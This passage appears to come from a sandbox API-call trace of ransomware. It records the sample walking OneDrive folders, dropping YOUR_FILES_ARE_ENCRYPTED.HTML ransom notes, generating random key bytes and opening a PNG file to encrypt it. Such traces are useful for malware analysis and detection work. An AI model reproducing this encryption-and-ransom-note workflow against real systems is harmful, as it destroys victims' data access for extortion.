wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="57") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="0D") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="11") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="9E") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="A4") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="A8") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="A5") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="B2") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="B6") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="85") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="AD") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="CE") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="59") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="C3") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="07") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="F4") returned 2 [0162.057] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="43") returned 2 [0162.058] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="1A") returned 2 [0162.058] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="2A") returned 2 [0162.058] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="47") returned 2 [0162.058] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="D5") returned 2 [0162.058] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="96") returned 2 [0162.058] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="18") returned 2 [0162.058] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="93") returned 2 [0162.058] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="9E") returned 2 [0162.058] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="7A") returned 2 [0162.058] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="1A") returned 2 [0162.059] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\RemoteAccess.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\RemoteAccess.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\RemoteAccess.dll" [0162.059] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0162.059] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0162.059] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa93f61b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa96577b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa96577b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ro", cAlternateFileName="")) returned 1 [0162.059] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ro") returned 74 [0162.059] GetProcessHeap () returned 0x270000 [0162.059] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.059] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ro" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ro") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ro" [0162.059] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ro", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ro\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ro\\*" [0162.059] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ro\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa93f61b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa96577b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa96577b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xba6a22, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.060] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa93f61b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa96577b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa96577b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xba6a22, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.060] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa96577b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa96577b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa96577b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130b0, dwReserved0=0xba6a22, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.060] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ro\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.060] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.060] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.060] lstrlenW (lpString=".mui") returned 4 [0162.060] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.060] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa96577b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa96577b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa96577b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130b0, dwReserved0=0xba6a22, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.060] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.060] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ro\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ro\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ro\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0162.061] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.064] CloseHandle (hObject=0x594) returned 1 [0162.064] GetProcessHeap () returned 0x270000 [0162.065] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.065] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa96577b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9d2f6f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9d2f6f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ru", cAlternateFileName="")) returned 1 [0162.065] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ru") returned 74 [0162.065] GetProcessHeap () returned 0x270000 [0162.065] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.065] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ru" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ru") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ru" [0162.065] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ru", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ru\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ru\\*" [0162.065] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ru\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa96577b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9d2f6f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9d2f6f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xba6a22, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.065] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa96577b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9d2f6f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9d2f6f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xba6a22, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.066] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9d2f6f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9d2f6f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9d2f6f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126a8, dwReserved0=0xba6a22, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.066] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ru\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.066] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.066] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.066] lstrlenW (lpString=".mui") returned 4 [0162.066] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.066] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9d2f6f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9d2f6f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9d2f6f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126a8, dwReserved0=0xba6a22, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.066] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.066] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ru\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ru\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ru\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0162.066] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.069] CloseHandle (hObject=0x594) returned 1 [0162.069] GetProcessHeap () returned 0x270000 [0162.070] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.070] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9d2f6f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9fb6e50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9fb6e50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="rw", cAlternateFileName="")) returned 1 [0162.070] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\rw") returned 74 [0162.070] GetProcessHeap () returned 0x270000 [0162.070] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.070] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\rw" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\rw") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\rw" [0162.070] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\rw", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\rw\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\rw\\*" [0162.070] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\rw\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9d2f6f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9fb6e50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9fb6e50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xba6a22, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.071] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9d2f6f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9fb6e50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9fb6e50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xba6a22, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.071] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9fb6e50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9fb6e50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9fb6e50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126a8, dwReserved0=0xba6a22, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.071] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\rw\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.071] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.071] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.071] lstrlenW (lpString=".mui") returned 4 [0162.071] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.071] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9fb6e50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9fb6e50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9fb6e50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x126a8, dwReserved0=0xba6a22, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.071] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.071] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\rw\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.072] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\rw\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\rw\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0162.072] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.074] CloseHandle (hObject=0x594) returned 1 [0162.075] GetProcessHeap () returned 0x270000 [0162.076] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.076] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa477def0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa477def0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa477def0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x124b, dwReserved0=0x0, dwReserved1=0x60, cFileName="ScreenshotLogo.png", cAlternateFileName="SCREEN~1.PNG")) returned 1 [0162.076] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotLogo.png") returned 90 [0162.076] lstrcmpW (lpString1="ScreenshotLogo.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.076] PathFindExtensionW (pszPath="ScreenshotLogo.png") returned=".png" [0162.076] lstrlenW (lpString=".png") returned 4 [0162.076] PathFindExtensionW (pszPath="ScreenshotLogo.png") returned=".png" [0162.077] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0162.077] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotLogo.png" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\screenshotlogo.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0162.077] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=4683) returned 1 [0162.077] GetProcessHeap () returned 0x270000 [0162.077] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0162.083] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="C9") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="7C") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="57") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="DA") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="62") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="A8") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="28") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="1E") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="67") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="D8") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="77") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="B4") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="6B") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="DF") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="83") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="D8") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="57") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="9C") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="4A") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="28") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="98") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="7A") returned 2 [0162.083] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="17") returned 2 [0162.084] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="58") returned 2 [0162.084] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="B5") returned 2 [0162.084] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="CB") returned 2 [0162.084] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="DD") returned 2 [0162.084] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="78") returned 2 [0162.084] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="CD") returned 2 [0162.084] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="E7") returned 2 [0162.084] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="D2") returned 2 [0162.084] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="58") returned 2 [0162.085] lstrcpyW (in: lpString1=0x743211c, 